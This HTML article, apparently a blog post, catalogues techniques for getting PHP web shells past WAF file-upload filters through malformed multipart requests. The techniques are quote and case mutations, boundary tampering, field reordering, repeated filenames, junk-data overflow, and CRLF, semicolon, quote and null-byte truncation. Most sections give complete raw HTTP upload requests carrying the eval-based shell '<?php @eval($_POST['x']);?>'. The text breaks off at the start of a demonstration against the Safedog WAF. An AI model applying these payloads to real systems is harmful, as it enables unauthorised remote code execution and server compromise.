&lt;p&gt;Currently, most common WAFs parse the file name; a minority, such as Chaitin, also inspect file content. The discussion below focuses on file‑name‑based interception.&lt;/p&gt;

&lt;p&gt;The general process is as follows:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Extract the &lt;code&gt;boundary&lt;/code&gt; value from the &lt;code&gt;Content-Type&lt;/code&gt; header of the request.&lt;/li&gt;
&lt;li&gt;Using the boundary, parse the POST data to obtain the file name.&lt;/li&gt;
&lt;li&gt;Determine whether the file name falls within an interception blacklist or outside a whitelist.&lt;/li&gt;
&lt;/ol&gt;

&lt;blockquote&gt;
&lt;p&gt;Having understood how a WAF intercepts malicious files, I classify common bypass methods into the following categories. A demonstration using the latest version of Safedog concludes the article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Character Mutations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Quotation Mark Variations
&lt;/h3&gt;

&lt;p&gt;Values in header fields can be enclosed in single quotes, double quotes, or no quotes at all, without affecting the upload outcome.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: "form-data"; name=file_x; filename="xx.php"
Content-Disposition: form-data; name=file_x; filename="xx.php"
Content-Disposition: form-data; name=file_x; filename=xx.php
Content-Disposition: form-data; name="file_x"; filename=xx.php
Content-Disposition: form-data; name='file_x'; filename='xx.php'
Content-Disposition: 'form-data'; name="file_x"; filename='xx.php'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It is also possible to omit the trailing quotation mark of the &lt;code&gt;filename&lt;/code&gt; string, and the upload will still succeed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="file_x"; filename="xx.php
Content-Disposition: form-data; name="file_x"; filename='xx.php
Content-Disposition: form-data; name="file_x"; filename="xx.php;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Case Modifications
&lt;/h3&gt;

&lt;p&gt;The following three fixed strings may be subjected to case changes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Content-Disposition&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;name&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;filename&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For example, &lt;code&gt;name&lt;/code&gt; may become &lt;code&gt;Name&lt;/code&gt;, and &lt;code&gt;Content-Disposition&lt;/code&gt; may become &lt;code&gt;content-disposition&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Inserting Line Break Characters
&lt;/h3&gt;

&lt;p&gt;Line breaks can be inserted between a field value and the equals sign; here the character &lt;code&gt;[0x09]&lt;/code&gt; is used to represent a line break.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php"
Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php
Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php"[0x09]
Content-Disposition: "form-data"; name="file_x"; filename=[0x09]xx.php
Content-Disposition: "form-data"; name="file_x"; filename=[0x09]xx.php[0x09];
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Multiple Semicolons
&lt;/h3&gt;

&lt;p&gt;During file parsing, the presence of multiple semicolons may prevent the WAF from correctly extracting the file name, thereby enabling a bypass.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="file_x";;; filename="test.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Multiple Equals Signs
&lt;/h3&gt;

&lt;p&gt;Using multiple equals signs within the POST content has no effect on file upload.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name=="file_x"; filename===="test.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Altering the Content-Disposition Value
&lt;/h3&gt;

&lt;p&gt;Some WAFs assume that the value of &lt;code&gt;Content-Disposition&lt;/code&gt; must be &lt;code&gt;form-data&lt;/code&gt;, which can lead to bypasses. In fact, &lt;code&gt;Content-Disposition&lt;/code&gt; may be arbitrarily altered or left empty.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: fOrM-DaTA; name="file_x"; filename="xx.php"
Content-Disposition: form-da+ta; name="file_x"; filename="xx.php"
Content-Disposition: fo    r m-dat a; name="file_x"; filename="xx.php"
Content-Disposition: form-dataxx; name="file_x"; filename="xx.php"
Content-Disposition: name="file_x"; filename="xx.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Malformed Boundary Headers
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;boundary&lt;/code&gt; can be mutated in the following ways without affecting the upload.&lt;/p&gt;

&lt;p&gt;Normal &lt;code&gt;boundary&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Malformed &lt;code&gt;boundary&lt;/code&gt; variations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The case of &lt;code&gt;multipart/form-data&lt;/code&gt; may be changed:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: mUltiPart/ForM-dATa; boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Spaces may separate &lt;code&gt;multipart/form-data&lt;/code&gt; and &lt;code&gt;boundary&lt;/code&gt;, and arbitrary content may be inserted between them:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: multipart/form-data boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data x boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data abcdefg boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data a\|/?!@#$%^() boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;A comma may separate &lt;code&gt;multipart/form-data&lt;/code&gt; and &lt;code&gt;boundary&lt;/code&gt;, with arbitrary content inserted between:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: multipart/form-data,boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data,x,boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data,abcdefg,boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data,a\|/?!@#$%^(),boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Arbitrary content may be inserted directly before the &lt;code&gt;boundary&lt;/code&gt; string (feasible on PHP):
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: multipart/form-data;bypass&amp;amp;123**{|}boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data bypass&amp;amp;123**{|}boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data,bypass&amp;amp;123**{|}boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;At the end of the &lt;code&gt;boundary&lt;/code&gt;, a comma or semicolon may be used to separate and insert arbitrary content:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111;123abc
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111,123abc
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Sequence Reversal
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Swapping the Order of name and filename
&lt;/h3&gt;

&lt;p&gt;Because &lt;code&gt;Content-Disposition&lt;/code&gt; must appear first, only the order of &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;filename&lt;/code&gt; can be reversed. Some WAFs may expect &lt;code&gt;name&lt;/code&gt; before &lt;code&gt;filename&lt;/code&gt;, enabling a bypass.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; filename="xx.php"; name="file_x"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Swapping the Order of Content-Disposition and Content-Type
&lt;/h3&gt;

&lt;p&gt;Similarly, the order of &lt;code&gt;Content-Disposition&lt;/code&gt; and &lt;code&gt;Content-Type&lt;/code&gt; can be exchanged.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Type: image/png
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Swapping the Order of Different Boundary Contents
&lt;/h3&gt;

&lt;p&gt;The contents of different boundary parts may also be reordered without affecting the upload.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Data Repetition
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Repetition of Boundary Content
&lt;/h3&gt;

&lt;p&gt;The file ultimately uploaded is &lt;code&gt;shell.php&lt;/code&gt; rather than &lt;code&gt;shell.jpg&lt;/code&gt;. However, if only the first file name is extracted, a bypass may occur.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="upload_file"; filename="shell.jpg"
Content-Type: image/png

&amp;lt;?php @eval($_POST['hack']); ?&amp;gt;
------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['hack']); ?&amp;gt;
------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundarymeEzpUTMsmOfjwAA--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The following variant also achieves a successful upload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;------WebKitFormBoundarymeEzpUTMsmOfjwAA
------WebKitFormBoundarymeEzpUTMsmOfjwAA--
------WebKitFormBoundarymeEzpUTMsmOfjwAA;123
------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['hack']); ?&amp;gt;
------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundarymeEzpUTMsmOfjwAA--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Repetition of filename
&lt;/h3&gt;

&lt;p&gt;The final uploaded file name is &lt;code&gt;shell.php&lt;/code&gt;. However, because the file name is extracted by matching the first occurrence, regular expressions will typically match the first instance.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="upload_file"; filename="shell.jpg filename="shell.jpg"; filename="shell.jpg"; filename="shell.php";
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Data Overflow
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Inserting Junk Data Between name and filename
&lt;/h3&gt;

&lt;p&gt;A large volume of junk data may be inserted between &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;filename&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Pass-02/index.php&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;close&lt;/span&gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="upload_file"; fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf; 
filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rf--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A semicolon must be placed after the large volume of junk data.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Inserting Junk Data into the Boundary String
&lt;/h3&gt;

&lt;p&gt;The boundary string can contain arbitrary data (subject to length limitations). When the length exceeds what the WAF can process but the web server can still handle, the file upload may bypass the WAF.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Pass-01/index.php&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;close&lt;/span&gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9
Content-Disposition: form-data; name="upload_file";filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Inserting Junk Data at the End of the Boundary
&lt;/h3&gt;

&lt;p&gt;As mentioned previously, arbitrary data may be appended to the end of the &lt;code&gt;boundary&lt;/code&gt; string; thus, a large volume of junk data can be added there.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Pass-01/index.php&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf,bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;592&lt;/span&gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rf--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Inserting Junk Data Between multipart/form-data and boundary
&lt;/h3&gt;

&lt;p&gt;Since it is possible to insert any data between &lt;code&gt;multipart/form-data&lt;/code&gt; and &lt;code&gt;boundary&lt;/code&gt;, a large volume of junk data can be placed there.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Pass-01/index.php&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;multipart/form-data bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;319&lt;/span&gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rf--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Data Truncation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Carriage Return and Line Feed Truncation
&lt;/h3&gt;

&lt;p&gt;POST request header values (not the header lines themselves) may contain line breaks, provided there are no blank lines. If the WAF stops matching the file name at a line break, a bypass can occur.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: for
m-data; name="upload_
file"; fi
le
name="sh
ell.p
h
p"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Semicolon Truncation
&lt;/h3&gt;

&lt;p&gt;If the WAF truncates the file name at a semicolon, a bypass can be achieved.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="upload_file"; filename="shell.jpg;.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Quotation Mark Truncation
&lt;/h3&gt;

&lt;p&gt;PHP versions prior to 5.3 exhibit single/double quote truncation behaviour.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="upload_file"; filename="shell.jpg'.php"
Content-Disposition: form-data; name="upload_file"; filename="shell.jpg".php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Null Byte Truncation
&lt;/h3&gt;

&lt;p&gt;In a URL, &lt;code&gt;%00&lt;/code&gt; represents the ASCII null character (0x00), which is reserved as a special character; when encountered, reading is terminated. Here &lt;code&gt;[0x00]&lt;/code&gt; denotes the hexadecimal null byte.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="upload_file"; filename="shell.php[0x00].jpg"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Practical Demonstration – Bypassing Safedog File Upload Protection
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Experimental Environment&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Target: Upload-Labs (Pass‑1)&lt;/li&gt;
